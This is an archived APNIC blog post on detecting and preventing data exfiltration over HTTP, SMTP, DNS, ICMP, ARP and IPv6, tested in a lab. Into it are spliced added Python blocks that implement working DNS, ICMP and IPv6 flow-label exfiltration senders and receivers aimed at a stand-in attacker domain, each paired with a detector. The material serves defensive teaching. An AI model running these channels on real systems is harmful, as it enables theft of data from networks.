{
	"id": "f9e8ea46-3058-4778-9d31-30c34af2b0cd",
	"created_at": "2026-04-06T00:10:05.062228Z",
	"updated_at": "2026-04-10T13:11:40.686007Z",
	"deleted_at": null,
	"sha1_hash": "0641f21d0b2feb24c2528c25671cf5ece33a9ed3",
	"title": "How to: Detect and prevent common data exfiltration attacks | APNIC Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3051127,
	"plain_text": "How to: Detect and prevent common data exfiltration attacks |\r\nAPNIC Blog\r\nPublished: 2022-03-30 · Archived: 2026-04-05 14:42:32 UTC\r\nPhoto: No Access by Bob Shand, Flickr\r\nData exfiltration is a technique used by malicious actors to carry out an unauthorized data transfer from a\r\ncomputer resource. Data exfiltration can be done remotely or locally and can be difficult to distinguish from normal\r\nnetwork traffic.\r\nTypes of data that are targeted include usernames, associated passwords and other system authentication-related\r\ninformation, cryptographic keys, financial records, information associated with strategic decisions, mailing\r\naddresses and their associated content, and anything else a cyber attacker considers valuable. The damage can be immeasurable when the\r\norganization’s most valuable data is in the hands of a cyber attacker.\r\nAdvanced Persistent Threats (APTs) are one form of cyberattack in which data exfiltration is often a primary goal.\r\nThe goal of an APT is to gain access to a network and remain undetected while it stealthily seeks out the most\r\nvaluable or targeted data.\r\nAttackers usually rely on covert channels for data exfiltration, because a channel that rides on existing legitimate connections or protocols is very difficult to\r\ndetect. A covert channel is a method of data\r\ntransfer between two parties (usually a malicious insider and a malicious outsider) over a medium that is not\r\nsupposed to be allowed to communicate by the computer security policy. The Trusted Computer System\r\nEvaluation Criteria (TCSEC) defines two kinds of covert channels:\r\nStorage channels, which communicate by modifying a ‘storage location’, such as a hard drive.\r\nTiming channels, which perform operations that affect the ‘real response time observed’ by the receiver.\r\nUnfortunately, an attacker does not need to use advanced tools to exfiltrate data. 
They can use very simple\r\ntechniques for stealing and transferring data from an internal network to an attacker domain, such as\r\nHTTP/HTTPS, SMTP, DNS, ICMP, P2P, VPN or even ARP. For example, the MITRE ATT\u0026CK framework exfiltration tactic (TA0010) describes how an attacker can take data collected within\r\na target network and exfiltrate it outside the network to systems under the attacker’s control.\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 1 of 13\n\nIn this post, I will review a few common data exfiltration techniques in a lab environment. I will also highlight the\r\nbest practices for detecting and preventing data exfiltration attacks.\r\nNote: All the cases in this post were tested in a sandbox environment for educational purposes only. The site\r\nowners, publisher and the author cannot be held responsible for any damages caused.\r\nIn this post, ‘Target Data’ means the data that malicious actors want to steal, copy and transfer to the attacker’s command and\r\ncontrol (C\u0026C) channel or an alternative channel.\r\nHypertext Transfer Protocol (HTTP)\r\nAttackers often use HTTP to exfiltrate data because this traffic is very common in enterprise networks and is\r\nalmost always permitted outbound. The high volume of HTTP traffic traversing enterprise networks allows attackers to hide\r\ntheir activity by mixing the stolen data with legitimate traffic.\r\nPOST is an HTTP method designed to send data to the server from an HTTP client. The HTTP POST method\r\nrequests that the web server accept the data enclosed in the body of the POST message. It is often used when\r\nuploading a file or when submitting a completed web form. 
Usually, there is no limit to the amount of data that\r\ncan be transferred using this method, except the limit imposed by the web server — if the file size is too large for\r\nthe web server to handle in a single POST request, it can be split up and sent in multiple requests.\r\nAttackers can configure the web server to respond to only specific types of requests, which allows attackers to\r\nremain stealthy. For example, the server only accepts requests from specific user-agents that are only known by\r\nthe attacker.\r\nRising Sun is a modular backdoor malware that can send data gathered from the infected machine via an HTTP\r\nPOST request to the command and control (C2) server. This malware has been observed targeting nuclear,\r\ndefence, energy, and financial service companies across the world.\r\nThe following basic example of data exfiltration (Figures 1-7) relies on HTTP POST. The lab environment\r\nconsists of one server as an HTTP web server with logging capabilities, and another that is considered a\r\ncompromised host, which will send the stolen data using the compromised system’s available tools without\r\ninstalling any additional software. One such tool is cURL, which is a library and command-line tool for\r\ntransferring data using various protocols. 
When used for data exfiltration, cURL can POST a file to an\r\nattacker’s web server from a compromised Linux host, as shown in Figure 1:\r\nFigure 1 — cURL command for POST file to attacker server.\r\nThe attacker can then listen and capture the incoming ‘Exfil Data’, as shown in Figure 2:\r\nFigure 2 — Attacker server response with cURL POST command executed from the victim host.\r\nIf the victim host is a Windows platform, the attacker can use PowerShell to send a file using the\r\nHTTP POST method over TCP port 80, as shown in Figure 3:\r\nFigure 3 — PowerShell code for HTTP POST from the victim host.\r\nThe attacker server response to the above command is shown in Figure 4:\r\nFigure 4 — HTTP POST received from the victim at the attacker’s listening server.\r\nAttackers can even encrypt or compress the target data before sending it to their server (Figure 5). This is often described as ‘stealth exfiltration’, because the transfer looks like legitimate traffic and usually raises no alarm\r\nin monitoring systems.\r\nFigure 5 — Victim host to attacker control system communication with encrypted Payload using\r\nHTTP POST.\r\nAfter the PowerShell code is executed, the following HTTP POST requests, carrying the encrypted payload/data,\r\nare sent to the attacker’s server (Figure 6).\r\nFigure 6 — HTTP POST along with encrypted payload received from the victim at the attacker’s\r\nlistening server.\r\nDecrypting the data is an easy job for the attacker, as they know the key (Figure 7).\r\nFigure 7 — Encrypted payload/data decryption.\r\nThe Simple Mail Transfer Protocol (SMTP)\r\nSMTP is one of the most common methods for data exfiltration. 
Several malware programs exfiltrate the stolen\r\ninformation to an attacker-controlled SMTP server. For example, Agent Tesla, a Windows-based keylogger\r\nand Remote Access Trojan (RAT), commonly uses SMTP to exfiltrate stolen data.\r\nAttackers can use the following PowerShell code (Figure 8) to send an email with an attached file (the stolen data) to\r\na remote address:\r\nFigure 8 — Victim host sends stolen data to the attacker-controlled email box using SMTP.\r\nFigure 9 shows the ‘Successful Email Delivered’ to the attacker’s email box:\r\nFigure 9 — Exfiltrated data delivered to attacker’s email box.\r\nThe related SMTP streams are shown in Figure 10:\r\nFigure 10 — SMTP streams.\r\nDomain Name System (DNS)\r\nThe DNS is the hierarchical and decentralized naming system used to identify computers, services, and other\r\nresources reachable through the Internet or other Internet Protocol (IP) networks. The protocol uses\r\nTCP/UDP port 53 by default and is intended only to exchange specific, well-defined kinds of data.\r\nDuring the exfiltration phase, the attacker makes a DNS query (initiates a domain name resolution request) for a name under a domain whose authoritative name server the attacker controls. Such requests are not usually blocked at the security perimeter, because the victim’s own resolver forwards them on the client’s behalf. Instead of responding\r\nwith an A record, the attacker’s name server can respond with a CNAME, MX or TXT record, which allows data to flow in both directions between the attacker and the victim.\r\nThe attacker can then use the following tools to extract files:\r\nDNSMessenger is a RAT used to conduct malicious PowerShell commands on compromised\r\ncomputers. DNSteal is a tool that creates a fake DNS server that allows attackers to stealthily extract files\r\nfrom a victim machine through DNS requests. 
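The screenshots show DNSteal in action but not what happens inside the query names. As an added example, not part of the original post and not DNSteal’s own code, the following Python shows both halves of such a channel (a sender that base32-encodes the file and chunks it into query labels, and the receiver’s reassembly) together with the defender’s counterpart: a detector over constructed resolver-log lines that flags the three properties the detection best practices at the end of the post rely on, namely overlong labels, high-entropy subdomains, and a burst of distinct subdomains under one domain from one client. The attacker domain, the log format, the thresholds and the ‘stolen’ file are all assumptions made for the demonstration.

```python
import base64
import math
from collections import defaultdict

# Constructed sample data (not from the post): a hypothetical attacker domain and a
# fake passwd-style file standing in for the Target Data.
ATTACKER_DOMAIN = 'cdn-telemetry.example'
SECRET = (b'root:x:0:0:root:/root:/bin/bash' + bytes([10])) * 8


def encode_file(data, domain, labels_per_query=3, label_len=63):
    '''Sender side of a DNSteal-style channel: base32 the file and pack it into query names.

    Every query is <seq>.<label>[.<label>...].<domain>. Base32 is used because DNS names
    are case-insensitive and labels may only hold [a-z0-9-]; a label is capped at 63 octets
    and a whole name at 253, which is why the data has to be chunked.'''
    b32 = base64.b32encode(data).decode().lower().rstrip('=')
    labels = [b32[i:i + label_len] for i in range(0, len(b32), label_len)]
    return [
        '.'.join([str(seq)] + labels[i:i + labels_per_query] + [domain])
        for seq, i in enumerate(range(0, len(labels), labels_per_query))
    ]


def decode_queries(queries, domain):
    '''Receiver side (the job of the fake name server): reorder by sequence number,
    strip the domain, join the labels and base32-decode.'''
    suffix = '.' + domain
    parts = {}
    for q in queries:
        seq, *labels = q[:-len(suffix)].split('.')
        parts[int(seq)] = ''.join(labels)
    b32 = ''.join(parts[k] for k in sorted(parts)).upper()
    b32 += '=' * (-len(b32) % 8)  # restore the padding that was stripped on the wire
    return base64.b32decode(b32)


def shannon_entropy(s):
    '''Bits per symbol: base32 data approaches 5.0, human-chosen hostnames stay well below 4.'''
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname):
    '''Naive last-two-labels rule; a production detector should use the Public Suffix List.'''
    return '.'.join(qname.rstrip('.').split('.')[-2:])


def detect_dns_exfil(log_lines, max_label_len=40, max_entropy=3.8, max_unique_subdomains=20):
    '''Defender side: score resolver-log lines of the constructed form
    <ts> <client> <qname> <qtype> with three cheap signals:
      long-label             a single label longer than any sane hostname
      high-entropy           the subdomain looks like encoded data, not words
      many-unique-subdomains one client asked for many distinct names under one domain
    Returns {registered_domain: [reasons]} for every domain that tripped a signal.'''
    findings = defaultdict(set)
    seen = defaultdict(set)  # (client, registered domain) -> distinct subdomains
    for line in log_lines:
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        _ts, client, qname, _qtype = line.split()
        rd = registered_domain(qname)
        if qname == rd:
            continue  # bare apex query carries no subdomain to inspect
        sub = qname[:-len(rd) - 1]
        seen[(client, rd)].add(sub)
        if max(len(lab) for lab in sub.split('.')) > max_label_len:
            findings[rd].add('long-label')
        if shannon_entropy(sub.replace('.', '')) > max_entropy:
            findings[rd].add('high-entropy')
    for (_client, rd), subs in seen.items():
        if len(subs) > max_unique_subdomains:
            findings[rd].add('many-unique-subdomains')
    return {rd: sorted(r) for rd, r in findings.items()}


def build_sample_log(label_len=63, labels_per_query=3):
    '''Constructed resolver log: ordinary lookups from one client, then the exfil queries.'''
    benign = ['www.example.org', 'mail.example.org', 'login.microsoftonline.com', 'cdn-a.cloudfront.net']
    lines = ['# ts client qname qtype']
    lines += [f'1700000000 10.0.0.5 {q} A' for q in benign]
    exfil = encode_file(SECRET, ATTACKER_DOMAIN, labels_per_query, label_len)
    lines += [f'1700000001 10.0.0.5 {q} A' for q in exfil]
    return lines


if __name__ == '__main__':
    for rd, reasons in detect_dns_exfil(build_sample_log()).items():
        print(rd, reasons)
```

The thresholds are starting points only: tune max_unique_subdomains against a baseline of your own resolver logs, since CDNs and some telemetry services legitimately generate many short-lived subdomains, and swap registered_domain for a Public Suffix List lookup before running this over real data. Note that a sender who keeps labels short and spreads the transfer over time defeats the first two signals, which is why the per-client subdomain count is the one worth keeping.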
DNSteal also supports Gzip compression of the transferred file.\r\nFigure 11 shows the attacker running the DNSteal tool with the -z parameter (the transferred file arrives\r\ncompressed/zipped at the attacker-controlled name server):\r\nFigure 11 — The DNSteal tool showing the attacker’s name system.\r\nFrom the victim system (Figure 12), the targetdata.txt file is sent over the DNS connection using the\r\nfollowing command:\r\nFigure 12 — The victim system sends the targetdata.txt file over the DNS.\r\nFinally, the attacker’s name server receives the target data (Figure 13).\r\nFigure 13 — The attacker’s name server receives the target data using DNS as a communication\r\nprotocol.\r\nInternet Control Message Protocol (ICMP)\r\nICMP is a supporting protocol in the Internet protocol suite and is widely known for its applications such as ping\r\nand traceroute. Malicious actors can use ICMP to exfiltrate data by taking advantage of organizations that allow\r\noutbound ICMP traffic. A common example of this is the Windows malware Pingback, which uses ICMP for its\r\nC2 activities.\r\nMetasploit has a module that will receive the exfiltrated data over ICMP from the victim host. To send the\r\ndata, the victim side needs a tool named Nping (Nping comes with Nmap). 
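The ICMP walkthrough that follows shows Nping and the Metasploit module only as screenshots. The following added Python example is not part of the original post and is not the Metasploit module’s code: it builds the constructed packets an Nping-style sender would emit (two ordinary pings, then a transfer of stoleninfo.txt that ends with the ‘EOF’ string), and then does what both the receiving side and a network defender replaying a capture need to do: parse IPv4 and ICMP, verify the ICMP checksum, discard payloads that match what real ping clients send, and reassemble the rest per source host until the EOF marker. The addresses, file name and file contents are constructed for the demo, and the recognition of the Windows and iputils ping payloads is a heuristic, not a complete allow-list.

```python
import ipaddress
import struct

# Payload that the Windows ping client sends; iputils ping is recognised by pattern below.
WINDOWS_PING = b'abcdefghijklmnopqrstuvwabcdefghi'


def inet_checksum(data):
    # RFC 1071 ones-complement sum, used by both the IPv4 header and ICMP.
    if len(data) % 2:
        data += bytes(1)
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src, dst, ident, seq, payload):
    # Constructed IPv4 + ICMP echo request with an arbitrary payload: the shape of what an
    # Nping-style sender (nping --icmp with a data string) puts on the wire.
    icmp = struct.pack('!BBHHH', 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack('!H', inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack('!H', inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_packet(pkt):
    # Decode IPv4 + ICMP; returns None for anything that is not ICMP (protocol 1).
    pkt = bytes(pkt)
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1:
        return None
    icmp = pkt[ihl:]
    typ, _code, csum, ident, seq = struct.unpack('!BBHHH', icmp[:8])
    return {
        'src': str(ipaddress.IPv4Address(pkt[12:16])),
        'dst': str(ipaddress.IPv4Address(pkt[16:20])),
        'type': typ, 'ident': ident, 'seq': seq, 'payload': icmp[8:],
        # recompute with the checksum field zeroed; a mismatch means a damaged or forged packet
        'checksum_ok': inet_checksum(icmp[:2] + bytes(2) + icmp[4:]) == csum,
    }


def looks_like_standard_ping(payload):
    # The two payloads real ping clients produce: Windows sends a fixed alphabet; iputils
    # ping sends a timestamp followed by bytes whose value equals their own offset
    # (0x10, 0x11, ... after a 16-byte timestamp on 64-bit builds, 0x08... on 32-bit).
    if payload == WINDOWS_PING:
        return True
    for ts_len in (16, 8):
        if len(payload) > ts_len and all(payload[i] == (i & 0xFF) for i in range(ts_len, len(payload))):
            return True
    return False


def reassemble_icmp_exfil(packets, eof_marker=b'EOF'):
    '''Receiver side of the channel in the post (the job of the Metasploit module), written
    the way a defender would replay a capture to learn what left the network: per source,
    the first non-ping echo-request payload is taken as the file name, later ones as
    content, and a payload equal to the EOF marker closes the transfer. Sources that send
    non-ping echo requests are reported even when no EOF ever arrives.'''
    streams = {}
    for pkt in packets:
        p = parse_packet(pkt)
        if p is None or p['type'] != 8 or not p['checksum_ok']:
            continue
        if looks_like_standard_ping(p['payload']):
            continue
        st = streams.setdefault(p['src'], {'name': None, 'data': bytearray(), 'complete': False, 'packets': 0})
        st['packets'] += 1
        if st['complete']:
            continue
        if p['payload'] == eof_marker:
            st['complete'] = True
        elif st['name'] is None:
            st['name'] = p['payload'].decode(errors='replace')
        else:
            st['data'] += p['payload']
    return streams


def build_sample_capture():
    # Constructed capture: two ordinary pings, then the Nping-style transfer of stoleninfo.txt.
    # Addresses, file name and contents are made up for the demo.
    victim, attacker = '10.0.0.23', '203.0.113.7'
    linux_ping = bytes(16) + bytes(range(0x10, 0x38))
    pkts = [build_echo_request('10.0.0.9', '10.0.0.1', 1, 1, WINDOWS_PING),
            build_echo_request('10.0.0.10', '10.0.0.1', 2, 1, linux_ping)]
    nl = bytes([10])
    secret = b'db_password=Sup3rS3cret!' + nl + b'api_key=example-key-0001' + nl
    chunks = [b'stoleninfo.txt'] + [secret[i:i + 16] for i in range(0, len(secret), 16)] + [b'EOF']
    pkts += [build_echo_request(victim, attacker, 7, seq, c) for seq, c in enumerate(chunks, 1)]
    return pkts, secret


if __name__ == '__main__':
    capture, _ = build_sample_capture()
    for src, st in reassemble_icmp_exfil(capture).items():
        print(src, st['name'], st['complete'], bytes(st['data']))
```

On a real capture, feed the IPv4 payload of every ICMP frame into reassemble_icmp_exfil and treat any source that appears in the result as worth a look, whether or not the transfer completed: a host whose echo requests do not carry a ping client’s payload is either running a network tool or a covert channel, and neither belongs on an ordinary workstation. Blocking outbound ICMP echo at the perimeter, or rate-limiting it, removes the channel entirely.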
The Metasploit module’s server-side component\r\nreceives and stores files exfiltrated over ICMP echo request packets.\r\nFigure 14 shows the Metasploit listener machine on the attacker’s side, after loading and running the module:\r\nFigure 14 — Metasploit module load and run for ICMP ping replies from the victim.\r\nFigure 15 shows an example of the victim host using the following command:\r\nFigure 15 — Victim uses the Nping tool to send stolen data using ICMP.\r\nIn the first command, Nping sends the file name via ICMP, so the transfer will show up as stoleninfo.txt on the attacker’s\r\nmachine. The second command sends the target data, and the final packets contain the ‘EOF’ string. This tells the\r\nMetasploit module that the data exfiltration over ICMP is complete.\r\nIn the attacker’s Metasploit module (Figure 16) we find the following:\r\nFigure 16 — Exfiltrated data stored in the attacker machine using ICMP.\r\nThe packet capture shows data being transferred via the ICMP protocol (Figure 17):\r\nFigure 17 — ICMP data exfiltration packet capture.\r\nAddress Resolution Protocol (ARP)\r\nARP is a communication protocol used for discovering link-layer addresses, such as a MAC address, associated\r\nwith a given Internet layer address. Because ARP is not routed, it can only carry data within the local network (outside\r\nthe Local Area Network (LAN) it will not work).\r\nAn attacker can exfiltrate data via the ARP protocol using ARPExfiltrator. This tool has two parts:\r\n1. Sender script, which runs on the victim machine.\r\n2. Receiver script, which runs on the attacker’s machine with root privilege.\r\nThe sender encodes the string buffer using the base64 algorithm and sends each character of the encoded string as a\r\nnetwork IPv4 address. 
The receiver matches each character against a shared list of IPv4 addresses and decodes the\r\nreceived base64-encoded string.\r\nThe process starts with the ‘receiver script’ on the attacker’s machine (Figure 18):\r\nFigure 18 — ‘Receiver script’ running on the attacker’s machine.\r\nThe victim host then sends the /etc/shadow file using the sender script (Figure 19):\r\nFigure 19 — Victim sends /etc/shadow content to the attacker host using ARPExfiltrator.\r\nThe attacker server receives the stolen data from the victim using ARPExfiltrator (Figure 20):\r\nFigure 20 — Attacker server listens for exfiltrated data over ARP.\r\nThe sender script sets the ARP opcode to 1: the opcode field in the ARP message specifies the\r\nnature of the ARP message, where 1 is an ARP request and 2 is an ARP reply. This results in a huge\r\nnumber of ARP request messages being sent in the LAN, as can be seen in Figure 21:\r\nFigure 21 — ARP request operation code.\r\nExfiltration using IPv6\r\nIPv6teal is a Python 3 tool that exfiltrates data from an internal network using a covert channel built on top of the\r\nIPv6 header flow label field.\r\nA flow is a group of packets, for example, a TCP session or a media stream. The special flow label 0 means the\r\npacket does not belong to any flow. The purpose of the flow label is to let routers and other on-path devices recognize the packets\r\nbelonging to one communication without inspecting the upper-layer headers. The source labels the packets so that a router can identify that a particular packet\r\nbelongs to a specific flow; keeping all packets of a flow on the same path is what avoids reordering of data packets.\r\nThe IPv6teal tool can build a covert channel by storing the data to exfiltrate in this field. 
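The IPv6teal screenshots below show the sender and receiver but not the packing itself. As an added example, not from the original post and not IPv6teal’s code, the following Python carries a constructed shadow-style line 20 bits per packet in the flow label, marks each packet with a magic value, a sequence number and the total length in the payload so the receiver can filter and reorder, and adds the check a defender can make: a flow label is meant to stay constant for the life of a flow (RFC 6437), so a source cycling through many labels towards one destination stands out. The magic value, the addresses and the payload layout are assumptions for the demonstration.

```python
import ipaddress
import struct
from collections import defaultdict

# Hypothetical marker; IPv6teal uses its own magic value, this one is only for the demo.
MAGIC = bytes.fromhex('deadbeef')
SECRET = b'root:$6$salt$hash:19000:0:99999:7:::'  # constructed /etc/shadow-style line


def pack_20bit_chunks(data):
    # Split the bytes into 20-bit integers, one per packet, left-aligned; the last chunk is
    # zero-padded, which the receiver undoes using the byte length carried in the payload.
    nbits = len(data) * 8
    nchunks = -(-nbits // 20)
    bits = int.from_bytes(data, 'big') << (nchunks * 20 - nbits)
    return [(bits >> (20 * (nchunks - 1 - i))) & 0xFFFFF for i in range(nchunks)]


def unpack_20bit_chunks(chunks, nbytes):
    bits = 0
    for c in chunks:
        bits = (bits << 20) | c
    bits >>= len(chunks) * 20 - nbytes * 8
    return bits.to_bytes(nbytes, 'big')


def build_ipv6_packet(src, dst, flow_label, payload, next_header=59):
    # Constructed fixed IPv6 header (RFC 8200): version 6, traffic class 0, 20-bit flow
    # label, payload length, next header, hop limit, addresses. 59 is No Next Header, so the
    # payload is opaque bytes rather than a real transport header.
    first_word = (6 << 28) | (flow_label & 0xFFFFF)
    hdr = struct.pack('!IHBB16s16s', first_word, len(payload), next_header, 64,
                      ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed)
    return hdr + payload


def parse_ipv6(pkt):
    first_word, plen, nh, _hop = struct.unpack('!IHBB', pkt[:8])
    return {'version': first_word >> 28, 'flow_label': first_word & 0xFFFFF,
            'src': str(ipaddress.IPv6Address(pkt[8:24])), 'dst': str(ipaddress.IPv6Address(pkt[24:40])),
            'next_header': nh, 'payload': pkt[40:40 + plen]}


def send_over_flow_label(data, src, dst):
    # Sender: 20 bits of file per packet in the flow label; the payload carries only the
    # magic value, a sequence number and the total byte length so the receiver can reorder.
    return [build_ipv6_packet(src, dst, chunk, MAGIC + struct.pack('!HI', seq, len(data)))
            for seq, chunk in enumerate(pack_20bit_chunks(data))]


def receive_over_flow_label(packets):
    # Receiver: ignore anything without the magic, order by sequence number, rebuild.
    chunks, nbytes = {}, None
    for pkt in packets:
        p = parse_ipv6(pkt)
        if p['version'] != 6 or not p['payload'].startswith(MAGIC):
            continue
        seq, nbytes = struct.unpack('!HI', p['payload'][4:10])
        chunks[seq] = p['flow_label']
    if nbytes is None:
        return b''
    return unpack_20bit_chunks([chunks[k] for k in sorted(chunks)], nbytes)


def detect_flow_label_churn(packets, max_labels_per_pair=3):
    # Defender: RFC 6437 expects one label per flow that stays constant for the life of the
    # flow. A source that cycles through many labels towards one destination is suspicious.
    # In production key on the full 5-tuple and alert on the rate of new labels, since one
    # host legitimately uses a different label per connection; (src, dst) is enough here.
    labels = defaultdict(set)
    for pkt in packets:
        p = parse_ipv6(pkt)
        if p['version'] == 6:
            labels[(p['src'], p['dst'])].add(p['flow_label'])
    return {pair: len(s) for pair, s in labels.items() if len(s) > max_labels_per_pair}


if __name__ == '__main__':
    pkts = send_over_flow_label(SECRET, '2001:db8::23', '2001:db8:dead::7')
    print(len(pkts), 'packets;', receive_over_flow_label(pkts))
    print(detect_flow_label_churn(pkts))
```

Two things follow for defenders. First, the channel needs nothing above the IP layer, so proxies and application firewalls never see it; only a device that inspects IPv6 headers on the way out can. Second, if IPv6 is not used on a segment, the simplest control is to drop it at the edge, since any IPv6 leaving a network that does not run IPv6 is by definition unexpected.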
The exfiltration script sends\r\none IPv6 packet per 20 bits of data, and the receiver script reconstructs the data by reading this field. The payload\r\nof every IPv6 packet sent contains a magic value, along with a sequence number, so the receiving end can\r\ndetermine which IPv6 packets are relevant for it to decode and in what order.\r\nFigure 22 shows the IPv6teal ‘sender script’ running on a victim host:\r\nFigure 22 — IPv6teal ‘sender script’ running on a victim host.\r\nFigure 23 shows the ‘IPv6teal receiver script’ running on the attacker-controlled machine, listening for and\r\ncapturing the targeted data:\r\nFigure 23 — ‘IPv6teal receiver script’ and related streams.\r\nBest practices for detecting data exfiltration\r\nDetecting data exfiltration can be a difficult task and depends largely on the type of attack method used. Cyber\r\nattackers use various sophisticated techniques, including legitimate processes and protocols that are harder to\r\ndetect. Consequently, analysts can mistakenly classify data exfiltration traffic as regular network traffic.\r\nTo detect the presence of a malicious actor, more and more organizations are using automated tools that flag\r\nmalicious or unusual traffic in real time. A Security Information and Event Management (SIEM) system is one such tool, correlating network and host logs in real time. Some SIEM solutions can even detect\r\nmalware communicating with C2 servers.\r\nOther best practices include:\r\nMonitoring for outbound traffic patterns, as malware needs to communicate regularly with C2 servers to\r\nmaintain a consistent connection. Continuous monitoring provides opportunities to detect data exfiltration\r\nover common protocols such as HTTP:80 or HTTPS:443. 
It’s worth keeping in mind that some advanced\r\nmalware randomizes the delays between C2 communications, so simple periodicity (beaconing) checks are not enough on their own.\r\nMonitoring the volume and frequency of data transmitted by organization users over email. To do\r\nthis we first need to calculate the average amount of data that internal users send per day. If this average\r\nis exceeded by a wide margin (say 5 or 10 times), an alert is raised for investigation.\r\nKeeping an up-to-date log of all approved IP address connections to compare against all new\r\nconnections. Along with this, it’s advised to keep an eye out for large data flows to unexpected IP\r\naddresses and major spikes in anomalous outbound traffic.\r\nMost of these practices require searching for known attack signatures and anomalies. From this information,\r\nanalysts can also build out the entire sequence of an event and map it to a known attack framework, such as the MITRE ATT\u0026CK tactics mentioned above.\r\nBest practices for preventing data exfiltration\r\nWe can divide the most effective measures into three categories: Preventative, Detective, and Investigative.\r\nFor example, we should ensure that only known acceptable services are permitted into and out of the network. 
If suspicious\r\nnetwork services are running, effective detective controls can trigger alerts so that analysts can investigate and\r\ntake the appropriate measures immediately.\r\nPreventative controls include: implementing and maintaining technical controls such as ACLs; deception techniques;\r\nencryption of data in process, in transit, and at rest; host-based auditing for identified security weaknesses; and\r\nremediation.\r\nInvestigative controls include forensic actions as well as intelligence-gathering operations, so security\r\nteams can improve their knowledge base and create custom detections that match the organization’s own\r\nrisk profile.\r\nThe following are a few straightforward methods to prevent data exfiltration from occurring in your network:\r\nEmployee terminations: The Computer Emergency Response Team (CERT) at the Software Engineering\r\nInstitute of Carnegie Mellon University produced a paper showing that employees were more likely to\r\nengage in data exfiltration when they anticipated imminent termination. An employee’s access\r\nto IT systems should be revoked immediately whenever the employee’s contract ends or is terminated. 
The\r\nsame is true of business partners or vendors.\r\nBlock unauthorized communication channels: Disable all unauthorized communication channels,\r\nports and protocols by default, and re-enable them on an as-needed basis.\r\nCreate a baseline of normal data flows: This includes the amounts of data accessed or transferred and the\r\ngeographical locations of access, against which abnormal behaviour can be compared.\r\nInstall proper technical controls to prevent phishing attacks: This also requires educating users about\r\nhow phishing attacks work, how to detect them, and what to do when they believe they are facing one.\r\nDeploy Data Loss Prevention (DLP) solutions: DLP technology can analyse the content of all data\r\ntransfers and check for sensitive information against pre-existing policies to detect suspicious activity. This,\r\ncombined with logging, increases the transparency of organizational data access and movement.\r\nImplement data encryption and data backup processes: Data encryption is a security method where\r\ninformation is encoded and can only be accessed or decrypted by a user with the correct encryption key.\r\nEncrypted data, also known as ciphertext, appears scrambled or unreadable to a person or entity accessing\r\nit without permission. Without the key, attackers have no way of understanding and using the data. 
Data\r\nbackups help restore lost data and resume operations while the data exfiltration attack is being investigated.\r\nEncryption provides some protection by preventing bad actors from reading the data, but only while the key stays out of their reach: a compromised account or process that can already read the plaintext can exfiltrate it regardless.\r\nImplement proper technical controls: Restrict and monitor ingress and egress to machines in the\r\norganization using networking rules, implement Identity and Access Management (IAM), set up bastion\r\nhosts, use granular permissions, and grant access to sensitive data only to those whose job function requires\r\nit.\r\nIn summary, reviewing common data exfiltration attack techniques helps to analyse possible attack surfaces and\r\nthe related detection capabilities. It also helps to improve an analyst’s threat hunting posture, because detecting\r\nany instance of data exfiltration as early as possible gives victims a chance to minimize the impact of a breach.\r\nDebashis Pal is an Information Security Specialist from Bangladesh.\r\nThe views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC.\r\nPlease note a Code of Conduct applies to this blog.\r\nSource: https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/"
	],
	"report_names": [
		"how-to-detect-and-prevent-common-data-exfiltration-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434205,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.pdf",
		"text": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.txt",
		"img": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.jpg"
	}
}